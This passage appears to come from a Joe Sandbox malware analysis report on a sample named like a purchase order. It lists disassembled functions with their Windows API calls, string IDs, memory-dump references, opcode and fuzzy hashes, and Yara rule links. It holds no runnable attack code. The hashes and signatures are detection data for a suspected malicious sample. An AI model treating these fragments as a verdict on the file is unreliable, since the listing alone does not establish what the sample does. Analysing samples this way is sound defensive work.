                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Connection_wcslen
                          • String ID: *$LPT
                          • API String ID: 1725874428-3443410124
                          • Opcode ID: d3b661fe0bcbc4771f8c85f691509fb157d99f4e5f5f4085c9732141d924a0f5
                          • Instruction ID: 8fd644ed0ccb4dc3dc6fecb8b53754714bb50d9e4585f5ac8beb7d3e245f9f06
                          • Opcode Fuzzy Hash: d3b661fe0bcbc4771f8c85f691509fb157d99f4e5f5f4085c9732141d924a0f5
                          • Instruction Fuzzy Hash: 81914D75A002049FCB14DF58C884EA9BBF1AF44314F19C09AE40A9F3A2D775ED85EB92
                          Function 00F2E294 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 212COMMON
                          Download Yara Rule
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 00F2E30D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorHandling__start
                          • String ID: pow
                          • API String ID: 3213639722-2276729525
                          • Opcode ID: f98c2255c8d24ea51c8eb753ceb5a125597d82f422f7e51ac813203638ad8e54
                          • Instruction ID: 160768d33669a0f9b21fc05c949e85493ddaf4ac65e0c59922c9dcfce5888486
                          • Opcode Fuzzy Hash: f98c2255c8d24ea51c8eb753ceb5a125597d82f422f7e51ac813203638ad8e54
                          • Instruction Fuzzy Hash: 2F5140E2E0C30596CB31B718DD413793BA4EF40771F344959E4D6422E9DB398CD5B646
                          Function 00F1E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID: #
                          • API String ID: 0-1885708031
                          • Opcode ID: 5ace759c1be7d6b3ae87bd6ab1f134d0b01fdaa2629839879e76075f80f13d6a
                          • Instruction ID: 8683b2bf49a15ad8891ad5b160a12565b039a1f6dfb85760f03f36e2d5112521
                          • Opcode Fuzzy Hash: 5ace759c1be7d6b3ae87bd6ab1f134d0b01fdaa2629839879e76075f80f13d6a
                          • Instruction Fuzzy Hash: 14516535D00286DFDB18DF28D490AFA7BA8EF1A321F244015FD619B2C0D6349E86FB90
                          Function 00F1F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 00F1F2A2
                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F1F2BB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          • API String ID: 2783356886-2766056989
                          • Opcode ID: 7794d46b47e1086887004624fe0f1ec486c252b8280eaac4e153627beb5410b4
                          • Instruction ID: f8d4f743ee821f321ad8392020a3a7590fc6803d8c505082df98a36f2ba383ce
                          • Opcode Fuzzy Hash: 7794d46b47e1086887004624fe0f1ec486c252b8280eaac4e153627beb5410b4
                          • Instruction Fuzzy Hash: CD5147714087499BD320AF10DC86BABBBF8FB84340F81895DF1D941195EB349529EB67
                          Function 00F85745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00F857E0
                          • _wcslen.LIBCMT ref: 00F857EC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: BuffCharUpper_wcslen
                          • String ID: CALLARGARRAY
                          • API String ID: 157775604-1150593374
                          • Opcode ID: c7b3b9971b321b19fec52a50e2cfdc364e4bb68cc5a5a82e2f551e61f01b9ef6
                          • Instruction ID: a75eae7ccc8f36c3bc02e73cb07d62bf7db3d6b50860f0672a0681077a344046
                          • Opcode Fuzzy Hash: c7b3b9971b321b19fec52a50e2cfdc364e4bb68cc5a5a82e2f551e61f01b9ef6
                          • Instruction Fuzzy Hash: B641A031E002099FCF04EFA9C8819EEBBB5EF59720F10406AE505A7292E7749D81EB90
                          Function 00F7D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 00F7D130
                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F7D13A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CrackInternet_wcslen
                          • String ID: |
                          • API String ID: 596671847-2343686810
                          • Opcode ID: ca5da0442c253189b884ee54280671390a9567b07f834b678ec09864e5da225d
                          • Instruction ID: b11c81eacc404c9d141bed89472d889eef067f0ba0cbd689947580ed0502ce37
                          • Opcode Fuzzy Hash: ca5da0442c253189b884ee54280671390a9567b07f834b678ec09864e5da225d
                          • Instruction Fuzzy Hash: 88316F71D00219ABDF11EFA4CC85EEE7FB9FF04310F404019F819A61A2E775AA16EB64
                          Function 00F9356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,?,?,?), ref: 00F93621
                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F9365C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$DestroyMove
                          • String ID: static
                          • API String ID: 2139405536-2160076837
                          • Opcode ID: 48e2845a0d3b40a11bb2f65c9310f4d07d2eeb7c9d448ee704df888e29cf0109
                          • Instruction ID: 6d94160b11e81fd2339d2dcedc0bad6489a8abea6da47990fd46a82d5ace37f7
                          • Opcode Fuzzy Hash: 48e2845a0d3b40a11bb2f65c9310f4d07d2eeb7c9d448ee704df888e29cf0109
                          • Instruction Fuzzy Hash: B2318D71500204AAEB10DF78DC80EFB73A9FF88764F018619F8A5D7280DA35AD91EB60
                          Function 00F94537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00F9461F
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F94634
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: '
                          • API String ID: 3850602802-1997036262
                          • Opcode ID: 500ae52e2e0d82c26204dbb85e89c120d8000f5b33f8d6d542041ecd6281c730
                          • Instruction ID: a457efb3a43aab4fc0bd37736cb54afb72ea39f42eaea8dbd6a006425f71b9f3
                          • Opcode Fuzzy Hash: 500ae52e2e0d82c26204dbb85e89c120d8000f5b33f8d6d542041ecd6281c730
                          • Instruction Fuzzy Hash: 683148B5A012099FEF14CFA9C990FDABBB5FF59300F15406AE904AB381D730A942DF90
                          Function 00F931EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F9327C
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F93287
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          • API String ID: 3850602802-2096851135
                          • Opcode ID: 5ffea2d642faa857bb881d6ce1fcc4d87a1901a26d59b0a949355856f4fa376c
                          • Instruction ID: a25d1d7c36a0ceae9c1301fc98441405f8f13f377c05f80e65d8bdfa831d25c3
                          • Opcode Fuzzy Hash: 5ffea2d642faa857bb881d6ce1fcc4d87a1901a26d59b0a949355856f4fa376c
                          • Instruction Fuzzy Hash: 4111B2727002087FFF259F94DC81EBB376BEB943A4F104129FA1897290D6319D51AB60
                          Function 00F93710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F0600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F0604C
                            • Part of subcall function 00F0600E: GetStockObject.GDI32(00000011), ref: 00F06060
                            • Part of subcall function 00F0600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F0606A
                          • GetWindowRect.USER32(00000000,?), ref: 00F9377A
                          • GetSysColor.USER32(00000012), ref: 00F93794
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                          • String ID: static
                          • API String ID: 1983116058-2160076837
                          • Opcode ID: 9782a25c1d7ee5499da6ba4381dfe984e598bcbef28f7301e1af76b55a6a44f3
                          • Instruction ID: e606042e38fb09daa277f19692a084cf0779a4ed47eaf2035f4890f49d20b15e
                          • Opcode Fuzzy Hash: 9782a25c1d7ee5499da6ba4381dfe984e598bcbef28f7301e1af76b55a6a44f3
                          • Instruction Fuzzy Hash: 4C1129B2610209AFEF10DFA8CC45AEA7BB8FB08354F004915F955E2250D735E851AB51
                          Function 00F7CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F7CD7D
                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F7CDA6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Internet$OpenOption
                          • String ID: <local>
                          • API String ID: 942729171-4266983199
                          • Opcode ID: 0f91ea274a98b2af7a4fa82387ea9f20969b52d7114a13001874a64e261dad10
                          • Instruction ID: 1a34ce4cd122f1776fbefe10003d5a1137904fb236ed4afaa5900380de887b05
                          • Opcode Fuzzy Hash: 0f91ea274a98b2af7a4fa82387ea9f20969b52d7114a13001874a64e261dad10
                          • Instruction Fuzzy Hash: F411A372605636BAD7344B668C45FE7BEA8EB167B4F00822FB52D83180D6649840E6F2
                          Function 00F93429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 00F934AB
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F934BA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          • Opcode ID: 141da4901369bce34ad8cd9044f9f2718a818e5df28940f69bd44f68846e7d57
                          • Instruction ID: cf652bd414932f6dfa244afd0c3e0ac4ce208d7da649521e27c6da6670b19cb4
                          • Opcode Fuzzy Hash: 141da4901369bce34ad8cd9044f9f2718a818e5df28940f69bd44f68846e7d57
                          • Instruction Fuzzy Hash: D6118F71900108ABFF118F68DC44AEB37AAEB45378F524724F965931D4C775EC51B760
                          Function 00F66C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • CharUpperBuffW.USER32(?,?,?), ref: 00F66CB6
                          • _wcslen.LIBCMT ref: 00F66CC2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharUpper
                          • String ID: STOP
                          • API String ID: 1256254125-2411985666
                          • Opcode ID: a7ee2d5d2702c9842f6abe406b7e03ec520d6d420a1e920e310a46a41e5c2979
                          • Instruction ID: 9727dc2d0b758fe09ff84f3c14e92f1ef0a2cddc75a7f10fd979b5622cd7c074
                          • Opcode Fuzzy Hash: a7ee2d5d2702c9842f6abe406b7e03ec520d6d420a1e920e310a46a41e5c2979
                          • Instruction Fuzzy Hash: 5801C032A0492B8ACB20AFBDDC819BF77A5EE61720B500528E862D7191EA75D940E650
                          Function 00F61CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F63CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F63CCA
                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F61D4C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          • Opcode ID: aaa26556b6ff093c3dbe8d3108b1f8f8df6e71eb8ed415336c89c7d639e65d36
                          • Instruction ID: fb833b446faf281811d3ba582b58d5ee4d339f7e475a3065c2793472012bff59
                          • Opcode Fuzzy Hash: aaa26556b6ff093c3dbe8d3108b1f8f8df6e71eb8ed415336c89c7d639e65d36
                          • Instruction Fuzzy Hash: F201D871A05219ABDB04EBA4CD51DFE77A8FB56360F040519F822573C2EA745908B7A0
                          Function 00F61BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F63CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F63CCA
                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F61C46
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          • Opcode ID: 39194628aaa75a0f5f9d5bf708841ce78005028f359021fb3e6e98036f98fdc7
                          • Instruction ID: 47657bedcc758f675cf0e6be1a20ea732e304870bfd472fb16d25173738356d9
                          • Opcode Fuzzy Hash: 39194628aaa75a0f5f9d5bf708841ce78005028f359021fb3e6e98036f98fdc7
                          • Instruction Fuzzy Hash: 5701A775A8111966DB04EB90CE52EFF77E8AB51340F140019B506672C2EA649E18B6B1
                          Function 00F61C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F63CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F63CCA
                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F61CC8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          • Opcode ID: 18791cacb94c8ddd100be56f771aef43cc43909141fd4164fd91dbe3fdfc2de5
                          • Instruction ID: f4ae95241324d49d8af83e1b5c0fec8f5218e80959c5b52a5a5373968980818f
                          • Opcode Fuzzy Hash: 18791cacb94c8ddd100be56f771aef43cc43909141fd4164fd91dbe3fdfc2de5
                          • Instruction Fuzzy Hash: E801A7B1F4011966DB04E790CE02EFF77E8AB11340F540015B801732C2EA649F08F671
                          Function 00F61D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F63CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F63CCA
                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00F61DD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_wcslen
                          • String ID: ComboBox$ListBox
                          • API String ID: 624084870-1403004172
                          • Opcode ID: 60b5b1073c61a14a0e362635acf2e12fa1fcad3640f58d084fbc54ec3ef0b07b
                          • Instruction ID: 9992ed56e94f45e98c01276487cd6ffdc3c340ab2f665ada23d290ca7f799afe
                          • Opcode Fuzzy Hash: 60b5b1073c61a14a0e362635acf2e12fa1fcad3640f58d084fbc54ec3ef0b07b
                          • Instruction Fuzzy Hash: 07F0C871F4521966DB04F7A4CD52FFF77BCBB41750F480919B922632C2EAA4A908B361
                          Function 00F8747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen
                          • String ID: 3, 3, 16, 1
                          • API String ID: 176396367-3042988571
                          • Opcode ID: 2a2d2cb622920bb083871b2459d5cc1f0f51a60e93cf0f24ed6b4a2768dbf60a
                          • Instruction ID: ab41636c2023b153978e82d5a93be0575be47aff3f3d370e50cbcf4bec3220b8
                          • Opcode Fuzzy Hash: 2a2d2cb622920bb083871b2459d5cc1f0f51a60e93cf0f24ed6b4a2768dbf60a
                          • Instruction Fuzzy Hash: 61E02B026043305093313279ACC1BBF7689CFC5760734182BF985C2266EAD8DDD1B3A1
